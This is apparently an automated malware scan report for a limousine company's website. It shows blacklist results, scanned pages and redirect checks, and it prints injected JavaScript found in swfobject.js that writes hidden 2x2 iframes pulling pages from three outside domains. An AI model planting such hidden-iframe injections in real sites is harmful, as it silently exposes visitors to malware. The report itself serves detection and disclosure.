Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gvslimos.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gvslimos.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gvslimos.com/ | 200 OK Content-Length: 8501 Content-Type: text/html | clean |
http://gvslimos.com/swfobject.js | 200 OK Content-Length: 7370 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whpu.html?j=796754></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://feldbacher.info/zepu.html?j=796754></iframe>'); if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof decon document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcpn.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whpu.html?j=796754 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whpu.html?j=796754> Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcpn.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcpn.html> Hidden iFrame found. size: 2x2 src: http://feldbacher.info/zepu.html?j=796754 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://feldbacher.info/zepu.html?j=796754> | ||
http://gvslimos.com/index.html | 200 OK Content-Length: 8501 Content-Type: text/html | clean |
http://gvslimos.com/pictures.html | 200 OK Content-Length: 8843 Content-Type: text/html | clean |
http://gvslimos.com/inicio.html | 200 OK Content-Length: 8700 Content-Type: text/html | clean |
http://gvslimos.com/fotos.html | 200 OK Content-Length: 8871 Content-Type: text/html | clean |
http://gvslimos.com/contactanos.html | 200 OK Content-Length: 7557 Content-Type: text/html | clean |
http://gvslimos.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://gvslimos.com/contact.html | 200 OK Content-Length: 7369 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gvslimos.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 09:29:50 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8501
Content-Type: text/html
Last-Modified: Fri, 01 Feb 2013 20:17:03 GMT
...8501 bytes of data.
GET / HTTP/1.1
Host: gvslimos.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 09:29:50 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8501
Content-Type: text/html
Last-Modified: Fri, 01 Feb 2013 20:17:03 GMT
...8501 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gvslimos.com
Referer: http://www.google.com/search?q=gvslimos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gvslimos.com
Referer: http://www.google.com/search?q=gvslimos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.